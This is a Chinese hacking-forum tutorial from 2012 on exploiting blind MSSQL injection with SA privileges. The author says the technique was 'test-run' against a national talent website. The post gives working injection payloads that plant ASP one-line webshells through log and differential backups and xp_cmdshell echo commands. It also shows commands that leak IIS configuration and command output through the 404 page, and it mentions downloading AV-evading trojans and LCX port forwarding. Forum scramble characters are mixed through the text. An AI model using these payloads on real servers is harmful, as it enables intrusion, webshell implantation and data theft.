找回密码
 立即注册
查看: 2870|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————7 @1 C! y* S- o: x
2 V( ^' \+ r$ K6 n
9 s# O: g( p- V) V- X4 h$ \6 M9 l
                                                             欢迎高手访问指导,欢迎新手朋友交流学习。3 x- `3 Y* F1 P, [1 M% S5 [/ w

7 ]& |+ e) c: o; X                                                                 
4 o$ w  V. w" A, q2 T( p                                                                 
# S3 H0 g- a/ _2 }                                                                  论坛: http://www.90team.net/
# {  t. u9 [9 ]" u- o' Z% g# q" g$ E1 l8 I7 S+ \! R7 E  G
- R* l' O8 r7 Z5 t

! r7 X' U) ~3 C5 k" T友情检测国家人才网
6 F' X* d$ L' {1 c* d# W! s# ~6 r  q& U$ s
& s" J2 @: l9 U# Q
内容:MSSQL注入SA权限不显错模式下的入侵) Z6 e- x5 {- B: ^$ b; E

8 e6 ~3 i* K$ ]
4 R* W! A& U- u, R& T8 C4 {0 ]一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
" a, F2 W, A$ \( [8 X
9 H3 `) S- }3 w' f, D: `; h' u我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。) G" B, H) }6 ?3 ?

8 [3 {6 D8 o! t* Y% J
) d$ N0 `; `) M这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。, b7 k( G% T5 y( U# G
8 A# u# Z, y/ V* e
思路:
- L8 z% C, g( }9 G; ^
* a, L7 {5 G3 E% ~首先:
" n9 j+ u  X2 Z/ f: Z
. {1 K  j% o1 x# Y通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
2 U3 V6 e- {+ G: D: s7 |- `0 N. A5 a6 N0 T
1.日志备份获得Webshell
0 T1 `, n$ }0 m' c8 N3 Y3 h* {" a0 m9 j* W3 f5 V- y0 t* r
2.数据库差异备份获得Webshell
& Y4 A$ W: E6 [  K9 g/ \
. L& N- [, _( c" j5 t4.直接下载免杀远控木马。- o' J' l# W4 i3 p7 k# N- J

6 V+ Q) d/ v: `5.直接下载LCX将服务器端口转发出来6 t2 f5 l( F/ Y$ u2 D! d1 ^( u' r
$ t* q& o+ R) ]' N& O3 y) \
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
' g3 Q* ]) M$ Q6 r, \, P  M
' Q5 |: P1 I  j% B' m9 h/ a! l3 N9 ]2 S) U' O6 N8 }4 Y+ u
  p! |: o0 w0 K( |5 D
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了, " N7 y; [5 {7 ^4 g# n

$ d5 n3 Q" U0 r3 X我直接演示后面一个方法' F8 D1 P( ]" ]- u' l0 C: b' R

5 @, w4 U. m2 ~! }! W' N2 N* @4 ^) d' r. T
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL 9 M3 _# J1 y$ \# N, j- Y/ q2 `
! L& r7 D# V" s
$ X" q/ ^5 Q: E1 f3 p4 s5 y1 G
$ ~. H/ R- f* q" X/ G

" J/ z- z9 M& a9 v◆日志备份:* H- D. w4 |4 j
  h3 d% N7 H$ H0 W' N* W# C
+ J4 a. ^+ S$ j: N* g9 `, Q# k
1. 进行初始备份
3 E6 w7 T" d6 s5 T; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--8 V: |/ m- l0 u; T, t# L

: K2 N7 B/ p- a) l* a3 z2. 插入数据
/ j4 b9 n" K  n+ b;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--7 \7 G* Y; O/ t
& N, \8 ?- ^" e2 o4 l" T
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>  N0 n7 l  s4 V; I( {" j) f
  
( p( T$ n3 Q/ f8 [4 `! X3. 备份并获得文件,删除临时表: ~% k2 }. h! R
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--$ b5 m( [2 O2 G  D: d0 ^
' n1 h" K0 V' \6 V9 p. O
* F3 k, A2 E$ L# ]# d$ K

: ?$ {8 c! O& `% L) g◆数据库差异备份: K! k" r) \& S7 E1 d1 P

! ^, i/ S! y9 A(1. 进行差异备份准备工作+ B& z; I' \9 I$ W" V2 q

7 Q8 t+ ~- ^/ i$ z( K;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
4 r" z) Q& K; |0 b) j, t* [
+ M" L1 L0 s; F! @上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
# m3 Y2 z' [' U- s  V
! T3 ]  T3 ^, f4 |8 J; C
" u8 `+ c* F: A  t1 k2 i(2. 将数据写入到数据库
) n( f! r5 n$ r2 w. H! x1 m# |- ^;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
# P: H1 ~/ A' Z( x# u9 o7 Z
' f  T3 ~5 n; `2 n0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>4 i" ?# M9 \, C0 J* W
/ E1 q2 I/ @7 O7 E; |
3. 备份数据库并清理临时文件, o# l$ l2 `% b4 j/ Z

! m" j3 _  m$ d8 Y0 q  X- Z- z# e;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
7 o, W& O0 Z9 W. o2 h1 k3 i0 O# g0 D, ]1 |' ?5 r% z2 Z" X( g, _
0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
9 S/ N, E( J+ a2 f5 d+ u& V
% W- F2 O6 z/ {' C& E9 K
  R/ Y. R2 v) Y; E' `
: u( u) O& l, b用^转义字符来写ASP(一句话木马)文件的方法:   ; h; X3 X% Q: g
/ c) b% X; P3 e& Q9 ]# K
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--! \! g) `& U% ]/ l) K6 x6 E9 @1 H& {1 U
5 F# }$ w) k# A; [& E9 E
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp # K: y. X8 t1 F% o4 l
' Y; l, p  i% E' \
读取IIS配置信息获取web路径: F- J  K% A. ~* u
+ t! e3 ~, s) J
     + A" p: C; s) Y. f; M" B0 d
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--% ]6 i" h/ t& ^# W! K) T: X
9 \5 E' ?& L/ Z5 o8 ^& \, F$ n
执行命令
. w8 ^1 F" E. j4 M. q" _; S     
% s+ c# Y0 g7 \+ H$ H     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
/ v3 v2 A+ G: s8 N' b. b% s3 q
/ v3 W2 ?# g* l5 m4 z, f
: D, {3 T! q8 Y( c/ _$ @5 }
. x9 }  r6 r: o; v
1 g' T, o) w; E* P* H* b# J/ g6 v4 H. W( U
2 m+ [3 t+ Q/ i% b* d' L
1 a, ~# S9 C5 }9 T7 s

9 ^6 l0 k7 ?4 `" ^: Y* y
5 i" u5 c. w7 d! I6 h/ i" _2 u# k+ W/ ^" a  D8 V1 D

" s6 }; S7 [' p4 ^, M( y+ ]
0 l: X% N# l- f) q2 v
" ^+ a" ~: o5 [5 s0 f/ w$ }  W+ H' d/ t/ c' b5 a

& \$ n2 Y/ K2 X) Z5 f7 H* b" Q' I) l4 T: k5 C

: S  J4 x1 i3 j  F8 g8 J% g: H! [/ d' O* e' q

' g' x. F7 p' B% I& j
  p/ b8 q+ [) @( j5 h
# t, S2 ?5 D8 C( s# ~- _- u2 g! C3 Q# {' G; J7 o! Z

  V# H0 ]4 R  B) m# C% a; m3 O3 A( R, E% p# d
# H# G* [$ J4 Y" J8 k6 U
2 u# e+ m( Z7 h- }( ?" v- E

" t% _9 \: r) ^, a5 Z2 u* [1 J# D3 m, e2 \
& E1 ~% X0 D' t3 |+ g
- G" G! @; a& w- J; O6 g& c0 {
+ Y: s$ `  k; S# O" G
! Q9 v- U0 N5 p' }5 E4 `

$ `1 |5 N3 c" ~
5 y/ t7 l2 p1 w) @3 M0 ]% X, ]3 A4 ~( W# M$ N9 E2 t3 `8 U6 G

( E  a; g# z6 f" Y0 e* q
1 A7 S, B7 ?. Q0 X" E! W9 s; ]2 |) L; j  L

$ R# y5 w; u5 V7 w7 _$ z8 ^
; W. n$ x2 y7 U( Q! z0 d
( u' H! x% E. O8 t% l! {" [9 m+ P% N% D! Y7 Y: l9 Y4 i* g
$ h) Q) d: k2 n# a

/ t+ {6 p8 Y$ Z8 h; q; `/ B" I0 I

; d+ _% w1 P# f9 J4 u/ u6 l
/ \' f: h( F4 I1 _* T2 O1 o
2 c+ V4 ]( h# W. W+ e1 M$ o
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表